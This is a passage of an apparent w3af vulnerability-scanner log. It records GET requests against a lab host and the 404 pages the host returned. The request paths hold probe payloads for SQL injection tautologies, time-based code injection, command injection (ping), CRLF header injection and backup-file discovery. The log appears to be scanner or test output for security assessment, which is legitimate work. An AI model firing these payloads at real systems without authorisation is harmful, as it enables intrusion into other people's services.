                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.backup1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="363">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.back HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.back&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="364">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.old HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="366">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.old1 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.old1&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="367">
                <http-request>
                    <status>GET http://10.12.68.43:31337/post.$$$ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.$$$&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="375">
                <http-request>
                    <status>GET http://10.12.68.43:31337/sleep%283%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="381">
                <http-request>
                    <status>GET http://10.12.68.43:31337/o7eib%3C%2F-%3Eo7eib%2F%2Ao7eib%22o7eibo7eib%27o7eibo7eib%60o7eibo7eib+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="385">
                <http-request>
                    <status>GET http://10.12.68.43:31337/85%22+OR+%2285%22%3D%2285 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="389">
                <http-request>
                    <status>GET http://10.12.68.43:31337/vb8Yr5XW HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="409">
                <http-request>
                    <status>GET http://10.12.68.43:31337/85%22+AND+%2285%22%3D%2286 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="423">
                <http-request>
                    <status>GET http://10.12.68.43:31337/85%27+OR+%2785%27%3D%2785 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="427">
                <http-request>
                    <status>GET http://10.12.68.43:31337/d%27z%220 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="428">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%3C%21-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="430">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%22 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="432">
                <http-request>
                    <status>GET http://10.12.68.43:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="435">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="438">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="440">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="443">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="457">
                <http-request>
                    <status>GET http://10.12.68.43:31337/__import__%28%27time%27%29.sleep%283%29 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="572" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/__import__%28%27time%27%29.sleep%283%29&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="467">
                <http-request>
                    <status>GET http://10.12.68.43:31337/85%27+AND+%2785%27%3D%2786 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="480">
                <http-request>
                    <status>GET http://10.12.68.43:31337/85+OR+85%3D85+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
